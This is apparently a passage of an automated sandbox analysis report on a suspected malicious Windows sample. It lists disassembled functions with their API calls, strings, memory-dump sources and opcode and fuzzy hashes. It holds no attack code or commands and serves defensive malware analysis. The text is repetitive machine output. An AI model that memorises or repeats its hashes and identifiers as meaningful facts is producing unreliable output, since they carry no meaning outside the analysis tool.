                                              • _free.LIBCMT ref: 00B7FB4B
                                                • Part of subcall function 00B429BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B42ADF
                                              Strings
                                              • Bad directive syntax error, xrefs: 00B7FB33
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: Bad directive syntax error
                                              • API String ID: 2861923089-2118420937
                                              • Opcode ID: f128ce6c5afa5c2b6730837f580526e4062b79b7b83eccc6bb25444c7769373f
                                              • Instruction ID: 42ca381a99540e1cb06833daf05ea13e5606b977c6900434e3c315338651825c
                                              • Opcode Fuzzy Hash: f128ce6c5afa5c2b6730837f580526e4062b79b7b83eccc6bb25444c7769373f
                                              • Instruction Fuzzy Hash: 1B914F7191021AAFCF14EFA4C891AFDB7F4FF05310F1485A9F829AB2A1DB309A45DB54
                                              Function 00B99CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B44AB2: __fread_nolock.LIBCMT ref: 00B44AD0
                                              • _wcscmp.LIBCMT ref: 00B99DE1
                                              • _wcscmp.LIBCMT ref: 00B99DF4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: d5a66e017ae0ec0f1a48ebd90660e4c1c3c417dbba17e376e87f6696c179dfff
                                              • Instruction ID: 5c9383ca38591d5a992803a308cbbbc3055d53955fd85c877ee720f10c2343fa
                                              • Opcode Fuzzy Hash: d5a66e017ae0ec0f1a48ebd90660e4c1c3c417dbba17e376e87f6696c179dfff
                                              • Instruction Fuzzy Hash: 3141E672A40209BADF20DAA4CC45FEFB7FDDF49714F0044BAFA00A7290D771AA048765
                                              Function 00B431BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B8032B
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00B80375
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                                • Part of subcall function 00B509C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B509E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: 18eff8e57d9414106fb82f25a233ad3ce35557d0e6be5b7493fcd137b3b1a067
                                              • Instruction ID: c15aea093aa7a43ea43adb1367eeb0e8fcb4d7f0677d0c983edf469708be1570
                                              • Opcode Fuzzy Hash: 18eff8e57d9414106fb82f25a233ad3ce35557d0e6be5b7493fcd137b3b1a067
                                              • Instruction Fuzzy Hash: 46218471A142889BCB41EF98C845BEE7BFCAF49700F1440DAE404E7241DBB55A8CDFA1
                                              Function 00BAD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa398b8cf8c110504bf92ca61216314e80ac9af185ea11c96af6bda3ba6e96f1
                                              • Instruction ID: ef2d366a143fc4f531cdbf56b87636b85bfefd7deadf8d35baf102c0311f68bc
                                              • Opcode Fuzzy Hash: aa398b8cf8c110504bf92ca61216314e80ac9af185ea11c96af6bda3ba6e96f1
                                              • Instruction Fuzzy Hash: B1F12A71A083019FC714DF28C484A6ABBE5FF89314F1489ADF89A9B351DB31E945CF82
                                              Function 00B3AC2A Relevance: 4.6, APIs: 3, Instructions: 90comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B4FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BB4186,00000001,00BC0980), ref: 00B4FFA7
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B3AD08
                                              • OleInitialize.OLE32(00000000), ref: 00B3AD85
                                              • CloseHandle.KERNEL32(00000000), ref: 00B72F56
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 3815369404-0
                                              • Opcode ID: c9ffe67787948aa44165ab904c8126d62688cd967721a7b5b7dfb44762bebfca
                                              • Instruction ID: 1326efc7158bb26702a68b88bc9502b04287c3d6b14ef5c5dc4e50a8592b644b
                                              • Opcode Fuzzy Hash: c9ffe67787948aa44165ab904c8126d62688cd967721a7b5b7dfb44762bebfca
                                              • Instruction Fuzzy Hash: 1B4100B19AD2418EC349EF6DAC416797FE4EBA931072086EAE428C73B1EF700915CB55
                                              Function 00B459D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B459F9
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B45A9E
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B45ABB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: 64698622d7b43cc6f82606d57989dbf693427722a8bb52b3ec0b2c53f5cd4119
                                              • Instruction ID: 599bbc5687903342da2e9f459bd243469c3512d401e19cc65302706705b26b27
                                              • Opcode Fuzzy Hash: 64698622d7b43cc6f82606d57989dbf693427722a8bb52b3ec0b2c53f5cd4119
                                              • Instruction Fuzzy Hash: 653173B0505B018FD730DF24D8846A7BBF4FB49304F000AAEF59A87251EB71AA44DB92
                                              Function 00B5593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00B55953
                                                • Part of subcall function 00B5A39B: __NMSG_WRITE.LIBCMT ref: 00B5A3C2
                                                • Part of subcall function 00B5A39B: __NMSG_WRITE.LIBCMT ref: 00B5A3CC
                                              • __NMSG_WRITE.LIBCMT ref: 00B5595A
                                                • Part of subcall function 00B5A3F8: GetModuleFileNameW.KERNEL32(00000000,00BF53BA,00000104,00000004,00000001,00B51003), ref: 00B5A48A
                                                • Part of subcall function 00B5A3F8: ___crtMessageBoxW.LIBCMT ref: 00B5A538
                                                • Part of subcall function 00B532CF: ___crtCorExitProcess.LIBCMT ref: 00B532D5
                                                • Part of subcall function 00B532CF: ExitProcess.KERNEL32 ref: 00B532DE
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              • RtlAllocateHeap.NTDLL(01930000,00000000,00000001,?,00000004,?,?,00B51003,?), ref: 00B5597F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: 3ece592741f60d0c610866afb4fcab118add891d02b121052f9b12b0ab168f6c
                                              • Instruction ID: 4769fd9f34e7cba334f3245de08446fd9647a476c8a22901dbaec1a862c03eb7
                                              • Opcode Fuzzy Hash: 3ece592741f60d0c610866afb4fcab118add891d02b121052f9b12b0ab168f6c
                                              • Instruction Fuzzy Hash: 6B01D231205B01DAE6312B28A862B2E33D8DF52773F5005EAFD14AB2D1DEB89D088661
                                              Function 00B992C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00B992D6
                                                • Part of subcall function 00B52F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52F99
                                                • Part of subcall function 00B52F85: GetLastError.KERNEL32(00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52FAB
                                              • _free.LIBCMT ref: 00B992E7
                                              • _free.LIBCMT ref: 00B992F9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                              • Instruction ID: 8a1a27c83322e36a7e4c98447f88786bdd5ac5e4d2225ff10a9969ca84948fb4
                                              • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                              • Instruction Fuzzy Hash: 28E012A160670257CEA4A77C7940F9377EC8F89752F1505FDB809D7142CE24E8458178
                                              Function 00B35E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 275d231fdc1466f7d636e1004b0b5009c97bc9cd0f4753cf7f627e11269f49b3
                                              • Instruction ID: 502e09753fc1f3bc710e85e1e51ac418c26b62a7469078b59c77aa351558162f
                                              • Opcode Fuzzy Hash: 275d231fdc1466f7d636e1004b0b5009c97bc9cd0f4753cf7f627e11269f49b3
                                              • Instruction Fuzzy Hash: 34323874508741EFDB24DF14C490A2AB7E1FF44304F2589ADE89A9B362DB35ED45CB82
                                              Function 00B448B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: 3c1103072a570b42d72d42ae789d422fc2e230cc22bbf7941178ab9fd7490688
                                              • Instruction ID: fe00ea7235576f69a6f8359442f22fb46be2a7df2330798cb944bfa6aa462199
                                              • Opcode Fuzzy Hash: 3c1103072a570b42d72d42ae789d422fc2e230cc22bbf7941178ab9fd7490688
                                              • Instruction Fuzzy Hash: 3F415D21A041985FDF21AB5888917BF7BE5DB55310F5840F5E882E7296D7208FA8F3E1
                                              Function 00BAE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strcat.LIBCMT ref: 00BAE20C
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • _wcscpy.LIBCMT ref: 00BAE29B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf_strcat_wcscpy
                                              • String ID:
                                              • API String ID: 1012013722-0
                                              • Opcode ID: 210f720de8b2f184812d6bd95ea4a5a990988cc517e077fc5eb775d190c96139
                                              • Instruction ID: cbe4c78c997bf8f00fcffa6348d58eb07aa56781b082eb1d4145242b6ffa0ac0
                                              • Opcode Fuzzy Hash: 210f720de8b2f184812d6bd95ea4a5a990988cc517e077fc5eb775d190c96139
                                              • Instruction Fuzzy Hash: 34912835A04604DFCB29DF18C5819A9B7E5FF4A310B6580EAE81A9F362DB30ED41CB84
                                              Function 00B50E38 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE ref: 00B50ED5
                                              • SetErrorMode.KERNELBASE ref: 00B50EE7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ChangeCloseErrorFindModeNotification
                                              • String ID:
                                              • API String ID: 1298299968-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 70409ff0d5d4d730a71df0d9d81bfcfda852c2fa8039119d92bb4b8aa0d67ce6
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: 2131D570A101099BC718EF18C4C2A69F7E6FF59301B788AE5E809CB651E731EDC5CB80
                                              Function 00B45F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00B45FEF
                                                • Part of subcall function 00B5359C: __lock.LIBCMT ref: 00B535A2
                                                • Part of subcall function 00B5359C: DecodePointer.KERNEL32(00000001,?,00B46004,00B88892), ref: 00B535AE
                                                • Part of subcall function 00B5359C: EncodePointer.KERNEL32(?,?,00B46004,00B88892), ref: 00B535B9
                                                • Part of subcall function 00B45F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B45F18
                                                • Part of subcall function 00B45F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B45F2D
                                                • Part of subcall function 00B45240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B4526C
                                                • Part of subcall function 00B45240: IsDebuggerPresent.KERNEL32 ref: 00B4527E
                                                • Part of subcall function 00B45240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B452E6
                                                • Part of subcall function 00B45240: SetCurrentDirectoryW.KERNEL32(?), ref: 00B45366
                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00B4602F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: 391d60495b44be8993217ecfb2cc1a7ea9fbf6c0b9bcb9866e86180ffe8e5920
                                              • Instruction ID: ed5b43613c89fb59a04f2212462e639624bbd20e7bdf8d8096e7d57aa4881aa0
                                              • Opcode Fuzzy Hash: 391d60495b44be8993217ecfb2cc1a7ea9fbf6c0b9bcb9866e86180ffe8e5920
                                              • Instruction Fuzzy Hash: BE117C719083019BC710EF69EC4591ABBE8EF99750F10499EF444872B2DFB0AA49CF92
                                              Function 00B442F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B43E72,?,?,?,00000000), ref: 00B44327
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00B43E72,?,?,?,00000000), ref: 00B80717
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 243d53f126b8a075689e6653ae95e0a005e8b2e927e7b92af0c313391429f0e4
                                              • Instruction ID: 1cfb04657006f03c9470bceaa4022140623de297affeb59ba5435063c2da7555
                                              • Opcode Fuzzy Hash: 243d53f126b8a075689e6653ae95e0a005e8b2e927e7b92af0c313391429f0e4
                                              • Instruction Fuzzy Hash: 7D019270244309BEF3601E28CC8AF667ADCEB05B68F10C359FAE46A1E0C7B05D59DB14
                                              Function 00B50FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B5593C: __FF_MSGBANNER.LIBCMT ref: 00B55953
                                                • Part of subcall function 00B5593C: __NMSG_WRITE.LIBCMT ref: 00B5595A
                                                • Part of subcall function 00B5593C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001,?,00000004,?,?,00B51003,?), ref: 00B5597F
                                              • std::exception::exception.LIBCMT ref: 00B5101C
                                              • __CxxThrowException@8.LIBCMT ref: 00B51031
                                                • Part of subcall function 00B587CB: RaiseException.KERNEL32(?,?,?,00BECAF8,?,?,?,?,?,00B51036,?,00BECAF8,?,00000001), ref: 00B58820
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: d245cfe0c1529138e3a3f0451d371620af117a57046648d408f5d2b800a101e6
                                              • Instruction ID: 1b1a41c2c5db04bab93277c2f79c2009d959a11eded18c555038e964c81279dd
                                              • Opcode Fuzzy Hash: d245cfe0c1529138e3a3f0451d371620af117a57046648d408f5d2b800a101e6
                                              • Instruction Fuzzy Hash: 87F0A47550421DA6CB21BA58EC15FDE7BECDF05752F5048E9FC14A2291DFB18B88C6E0
                                              Function 00B5581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: f43934d88fecf322053c4b75f33f135173a71f8ae8606d2d75ede3917c8003d6
                                              • Instruction ID: 7c1f7b998e229d02335a6b2874943c8298ef2364d1af1b267c2d967a8c064816
                                              • Opcode Fuzzy Hash: f43934d88fecf322053c4b75f33f135173a71f8ae8606d2d75ede3917c8003d6
                                              • Instruction Fuzzy Hash: 52017571800748EBCF21AF658C01B9E7BE1AF50363F1441D5BC14671A1DB318616DB91
